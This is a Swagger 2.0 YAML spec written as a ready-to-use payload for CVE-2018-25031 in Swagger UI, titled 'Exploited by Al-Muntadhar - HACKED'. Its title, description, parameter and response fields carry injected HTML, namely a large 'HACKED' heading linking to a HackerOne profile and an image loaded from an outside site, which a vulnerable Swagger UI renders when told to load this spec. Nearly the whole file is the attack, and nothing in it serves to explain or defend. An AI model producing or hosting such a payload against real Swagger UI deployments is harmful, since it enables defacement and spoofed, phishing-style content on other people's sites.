---
swagger: '2.0'
info:
  title: Exploited by Al-Muntadhar - HACKED
  description: |
    CVE-2018-25031 

  version: production
basePath: https://hackerone.com/almuntadhar
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
  "/almuntadhar":
    get:
      responses:
        '200':
          description: Exploited Succesfully <a href="https://hackerone.com/almuntadhar"><h1>HACKEDDDDDDDDDDDDDDDDD</h1></a> <img src="https://www.websitepulse.com/blog/uploads/hacked-website.png" />
      tags:
      - EZ
      operationId: findAccounts
      summary: this is example text 
  "/almuntadhar_delete":
    delete:
      parameters:
      - description: |
          <a href="https://hackerone.com/almuntadhar"><h1>HACKEDDDDDDDDDDDDDDDDD</h1></a> <img src="https://www.websitepulse.com/blog/uploads/hacked-website.png" />

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: CVE-2018-25031
      tags:
      - Swagger UI exploit
      operationId: swagger
      summary: swagger
    get:
      parameters:
      - description: <a href="https://hackerone.com/almuntadhar"><h1>HACKEDDDDDDDDDDDDDDDDD</h1></a> <img src="https://www.websitepulse.com/blog/uploads/hacked-website.png" />
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: <a href="https://hackerone.com/almuntadhar"><h1>HACKEDDDDDDDDDDDDDDDDD</h1></a> <img src="https://www.websitepulse.com/blog/uploads/hacked-website.png" />
      tags:
      - Swagger UI exploit
      operationId: some_operation
      summary: this is example text
